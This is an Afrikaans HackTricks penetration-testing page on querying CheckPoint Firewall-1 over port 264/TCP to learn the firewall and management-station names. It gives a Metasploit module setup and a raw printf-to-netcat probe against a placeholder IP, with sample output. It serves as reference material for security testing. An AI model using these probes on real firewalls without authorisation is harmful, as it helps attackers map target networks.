4.3 KiB
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.
Dit is moontlik om met CheckPoint Firewall-1-brandmuure te kommunikeer om waardevolle inligting soos die naam van die brandmuur en die naam van die bestuursstasie te ontdek. Dit kan gedoen word deur 'n navraag na poort 264/TCP te stuur.
Verkryging van Brandmuur- en Bestuursstasienames
Met 'n voorverifikasieversoek kan jy 'n module uitvoer wat die CheckPoint Firewall-1 teiken. Die nodige opdragte vir hierdie operasie word hieronder uiteengesit:
use auxiliary/gather/checkpoint_hostname
set RHOST 10.10.10.10
By uitvoering probeer die module om kontak te maak met die firewall se SecuRemote Topology-diens. As dit suksesvol is, bevestig dit die teenwoordigheid van 'n CheckPoint Firewall en haal die name van beide die firewall en die SmartCenter-bestuursgasheer op. Hier is 'n voorbeeld van hoe die uitset kan lyk:
[*] Attempting to contact Checkpoint FW1 SecuRemote Topology service...
[+] Appears to be a CheckPoint Firewall...
[+] Firewall Host: FIREFIGHTER-SEC
[+] SmartCenter Host: FIREFIGHTER-MGMT.example.com
[*] Auxiliary module execution completed
Alternatiewe Metode vir Hostnaam en ICA Naam Ontdekking
'n Ander tegniek behels 'n direkte bevel wat 'n spesifieke navraag na die firewall stuur en die respons ontleed om die firewall se hostnaam en ICA-naam te onttrek. Die bevel en sy struktuur is as volg:
printf '\x51\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x0bsecuremote\x00' | nc -q 1 10.10.10.10 264 | grep -a CN | cut -c 2-
Die uitset van hierdie bevel verskaf gedetailleerde inligting oor die sertifikaatnaam (CN) en organisasie (O) van die firewall, soos hieronder gedemonstreer:
CN=Panama,O=MGMTT.srv.rxfrmi
Verwysings
- https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360
- https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html#check-point-firewall-1-topology-port-264
Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
Ander maniere om HackTricks te ondersteun:
- As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
- Kry die amptelike PEASS & HackTricks swag
- Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
- Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
- Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-repos.